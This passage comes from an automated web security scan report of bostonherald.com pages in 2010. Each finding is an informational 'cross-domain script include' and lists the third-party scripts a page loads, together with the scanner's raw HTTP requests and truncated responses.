Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.6. http://bostonherald.com/blogs/entertainment/the_assistant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/entertainment/the_assistant/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects

Request

GET /blogs/entertainment/the_assistant/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:09:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/entertainment/the_assistant/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 86796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

9.7. http://bostonherald.com/blogs/lifestyle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/lifestyle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /blogs/lifestyle/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

9.8. http://bostonherald.com/blogs/lifestyle/fork_lift/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/lifestyle/fork_lift/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects

Request

GET /blogs/lifestyle/fork_lift/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:15:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/lifestyle/fork_lift/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

9.9. http://bostonherald.com/blogs/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /blogs/news/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 50924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.10. http://bostonherald.com/blogs/news/city_desk_wired/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/news/city_desk_wired/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://widgets.twimg.com/j/2/widget.js

Request

GET /blogs/news/city_desk_wired/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/city_desk_wired/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<p><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

9.11. http://bostonherald.com/blogs/sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/sports/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /blogs/sports/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.12. http://bostonherald.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /business/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:31:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 87647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

9.13. http://bostonherald.com/business/automotive/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/automotive/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/automotive/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.14. http://bostonherald.com/business/automotive/view/20101105chevy_volt_fact_vs_fiction/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/automotive/view/20101105chevy_volt_fact_vs_fiction/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/automotive/view/20101105chevy_volt_fact_vs_fiction/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:29:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.15. http://bostonherald.com/business/automotive/view/20101105value_of_gms_new_stock_difficult_to_pin_down/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/automotive/view/20101105value_of_gms_new_stock_difficult_to_pin_down/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
